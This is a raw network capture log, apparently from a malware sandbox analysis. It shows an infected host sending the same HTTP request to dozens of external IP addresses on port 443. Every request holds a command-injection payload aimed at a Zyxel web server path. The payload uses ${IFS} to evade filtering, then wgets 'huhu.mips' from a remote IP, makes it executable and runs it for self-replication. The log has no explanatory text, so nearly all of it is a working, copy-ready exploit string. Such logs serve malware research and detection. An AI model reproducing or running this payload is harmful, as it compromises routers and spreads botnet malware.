                                                        Feb 2, 2024 06:21:12.994050026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5219192.168.2.1445326109.32.127.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994093895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5220192.168.2.1455210105.209.153.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994129896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5221192.168.2.1436386161.173.98.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994179964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5222192.168.2.1434244126.19.109.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994201899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5223192.168.2.1439330196.240.6.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994262934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5224192.168.2.146083699.220.99.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994306087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5225192.168.2.144698061.9.81.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994338989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5226192.168.2.145164880.79.46.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994396925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5227192.168.2.1446074137.14.121.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994430065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5228192.168.2.1437390210.101.40.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994488955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5229192.168.2.145622865.21.175.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994508982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5230192.168.2.145931271.165.134.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994539022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5231192.168.2.1454012173.145.13.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994564056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5232192.168.2.1436142137.139.145.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994641066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5233192.168.2.1441780195.7.214.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994677067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5234192.168.2.1443374167.227.157.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994709969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5235192.168.2.143517434.173.200.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994749069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5236192.168.2.1453146148.115.247.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994776011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5237192.168.2.1447626143.142.182.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994812012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5238192.168.2.145462436.89.101.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994842052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5239192.168.2.145090466.171.236.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994899035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5240192.168.2.1451570175.114.41.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994937897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5241192.168.2.1435610115.215.227.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994976044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5242192.168.2.1440952106.105.249.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995027065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5243192.168.2.1457660173.30.244.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995083094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5244192.168.2.145000264.92.210.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995181084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5245192.168.2.143861419.133.62.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995222092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5246192.168.2.1457156163.119.137.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995258093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5247192.168.2.1440954171.48.200.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995315075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5248192.168.2.145708257.137.10.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995347977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5249192.168.2.14530984.22.56.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995387077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5250192.168.2.1447670186.154.4.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995436907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5251192.168.2.1444720141.103.193.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995472908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5252192.168.2.143985023.244.207.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995505095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5253192.168.2.1434970154.184.250.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995543003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5254192.168.2.1445158184.197.66.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995599985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5255192.168.2.145782490.166.160.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995630026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5256192.168.2.1441656148.248.178.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995675087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5257192.168.2.1440816193.197.160.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995711088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5258192.168.2.1451614178.133.100.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995770931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5259192.168.2.1434070132.112.115.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.995798111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5260192.168.2.143784449.112.58.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.999346018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5261192.168.2.143422227.117.56.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.999387980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5262192.168.2.1456928211.206.11.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.999417067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5263192.168.2.144620442.182.147.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.999464989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5264192.168.2.1443962201.172.89.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.999504089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5265192.168.2.143615084.214.227.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.999550104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5266192.168.2.145482089.149.172.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.999583960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5267192.168.2.1457654100.144.106.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.992925882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5268192.168.2.145858462.19.69.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.992969990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5269192.168.2.144282843.238.178.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993046999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5270192.168.2.1445838138.24.247.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993102074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5271192.168.2.145186092.80.62.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993134022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5272192.168.2.1446610149.253.179.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993181944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5273192.168.2.144786879.10.18.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993230104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5274192.168.2.143299081.122.235.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993267059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5275192.168.2.1449012163.205.242.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993325949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5276192.168.2.145411477.62.16.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993376970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5277192.168.2.1448748125.74.87.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993406057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5278192.168.2.1447494192.57.85.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993446112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5279192.168.2.1455648210.223.175.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993496895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5280192.168.2.1444880106.185.15.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993546963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5281192.168.2.1447462123.185.220.90443
                                                        TimestampBytes transferredDirectionData
